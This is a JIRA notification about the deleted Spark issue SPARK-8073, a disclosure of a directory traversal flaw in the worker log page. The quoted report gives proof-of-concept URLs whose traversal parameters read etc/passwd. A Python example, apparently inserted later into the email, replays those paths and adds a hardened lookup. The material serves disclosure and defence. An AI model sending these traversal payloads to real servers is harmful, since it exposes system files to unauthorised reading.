[ https://issues.apache.org/jira/browse/SPARK-8073?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Patrick Wendell deleted SPARK-8073:
-----------------------------------
> Directory traversal vulnerability
> ---------------------------------
>
> Key: SPARK-8073
> URL: https://issues.apache.org/jira/browse/SPARK-8073
> Project: Spark
> Issue Type: Bug
> Environment: Centos6.4
> Reporter: 0keeTeam
> Priority: Critical
>
> We are an information security team from the QIHU 360 company, China.
> We found a 0-day vulnerability in Spark and are writing to apply for a CVE
> ID. Please refer to the report below. Thanks!
> [Team info]
> name: 0keeTeam
> company: QIHU 360 company, China
> email: [email protected]
> Details of the vulnerability are as follows:
> {color:red}
> PoC & Exp:
> http://xxx.com/logPage/?appId=../../../../../../../../../../../../../../../&executorId=&logType=etc/passwd
> or:
> http://xxx.com/logPage/?driverId=../../../../../../../../../../../../../../../&logType=etc/passwd
> {color}
> *spark-1.3.1\core\src\main\scala\org\apache\spark\deploy\worker\ui\LogPage.scala, line 36:*
> {quote}{color:red}// parameters from the GET request are not filtered{color}
> val appId = Option(request.getParameter("appId"))
> val executorId = Option(request.getParameter("executorId"))
> val driverId = Option(request.getParameter("driverId"))
> val logType = request.getParameter("logType")
> val offset = Option(request.getParameter("offset")).map(_.toLong)
> val byteLength = Option(request.getParameter("byteLength")).map(_.toInt).getOrElse(defaultBytes)
> ........
> val (logText, startByte, endByte, logLength) = getLog(logDir, logType, offset, byteLength)
> {quote}
> *and line 125:*
> {quote}
> private def getLog(
> ........
> val files = RollingFileAppender.getSortedRolledOverFiles(logDirectory, logType)
> ........
> val logText = Utils.offsetBytes(files, startIndex, endIndex)
> {quote}
> *spark-1.3.1\core\src\main\scala\org\apache\spark\util\logging\RollingFileAppender.scala, line 152:*
> {quote}
> def getSortedRolledOverFiles(directory: String, activeFileName: String):
> ........
> val file = new File(directory, activeFileName).getAbsoluteFile
> ........
> {quote}
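The root cause quoted above is that `new File(directory, activeFileName).getAbsoluteFile` is built from request-controlled strings and `getAbsoluteFile` only normalises the path, it never checks where it ends up. The following is an added example, not Spark's code and not the reporter's: it reproduces that unchecked join in Python (the verifier runs Python; the logic is identical to the Scala `File` join) and places a hardened lookup beside it. The worker layout `workDir/<appId>/<executorId>/<logType>` and `workDir/<driverId>/<logType>`, the allowed log types `stdout`/`stderr`, and the identifier pattern are assumptions made for the example, not facts taken from the Spark source.

```python
"""Added example, not Spark's own code: the unchecked path build behind the
SPARK-8073 report, next to a hardened version of the same lookup."""
import os
import re

# Assumption for this example: executor logs live under workDir/<appId>/<executorId>/
# and driver logs under workDir/<driverId>/, and only these two file names are logs.
ALLOWED_LOG_TYPES = frozenset({"stdout", "stderr"})
# Assumed identifier grammar: no separators, no leading dot, so '..' and '' cannot pass.
_ID_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*$")


def log_dir_for(work_dir, app_id=None, executor_id=None, driver_id=None):
    """Pick the log directory from the request parameters, exactly as received."""
    if app_id is not None and executor_id is not None:
        return os.path.join(work_dir, app_id, executor_id)
    if driver_id is not None:
        return os.path.join(work_dir, driver_id)
    raise ValueError("need appId+executorId or driverId")


def vulnerable_log_path(work_dir, log_type, **ids):
    """Equivalent of new File(directory, activeFileName).getAbsoluteFile:
    join the request strings and normalise, with no containment check."""
    return os.path.abspath(os.path.join(log_dir_for(work_dir, **ids), log_type))


def poc_paths(work_dir="/opt/spark/work"):
    """Replay the two PoC URLs from the report against the unchecked join.
    work_dir is a constructed sample path; both results resolve to /etc/passwd."""
    traversal = "../" * 15
    return {
        "executor": vulnerable_log_path(work_dir, "etc/passwd",
                                        app_id=traversal, executor_id=""),
        "driver": vulnerable_log_path(work_dir, "etc/passwd", driver_id=traversal),
    }


def _check_id(name, value):
    # Reject separators, '.', '..' and the empty string (the PoC sends executorId=).
    if value in (".", "..") or not _ID_RE.match(value):
        raise ValueError(f"invalid {name}: {value!r}")


def safe_log_path(work_dir, log_type, **ids):
    """Hardened lookup: whitelist logType, validate each id, then confirm the
    resolved path is still inside work_dir. The last check is defence in depth
    so a future layout change cannot silently reopen the traversal."""
    if log_type not in ALLOWED_LOG_TYPES:
        raise ValueError(f"invalid logType: {log_type!r}")
    for name, value in ids.items():
        if value is not None:
            _check_id(name, value)
    base = os.path.realpath(work_dir)
    candidate = os.path.realpath(os.path.join(log_dir_for(work_dir, **ids), log_type))
    # realpath resolves symlinks too, so a symlink planted inside work_dir that
    # points outside is also caught here.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("resolved path escapes the worker directory")
    return candidate


def lookup_outcome(work_dir, log_type, **ids):
    """Return ('ok', path) or ('rejected', reason) for the hardened lookup."""
    try:
        return "ok", safe_log_path(work_dir, log_type, **ids)
    except ValueError as exc:
        return "rejected", str(exc)


if __name__ == "__main__":
    for kind, path in poc_paths().items():
        print(f"unchecked join, {kind} PoC -> {path}")
    print(lookup_outcome("/opt/spark/work", "etc/passwd",
                         app_id="../" * 15, executor_id=""))
    print(lookup_outcome("/opt/spark/work", "stdout",
                         app_id="app-20150601", executor_id="0"))
```

The whitelist on `logType` alone would already stop the two PoC URLs, but it is the containment check on the final resolved path that actually enforces the property you care about (nothing outside the worker directory is ever opened), which is why the example applies all three layers rather than relying on one.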
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)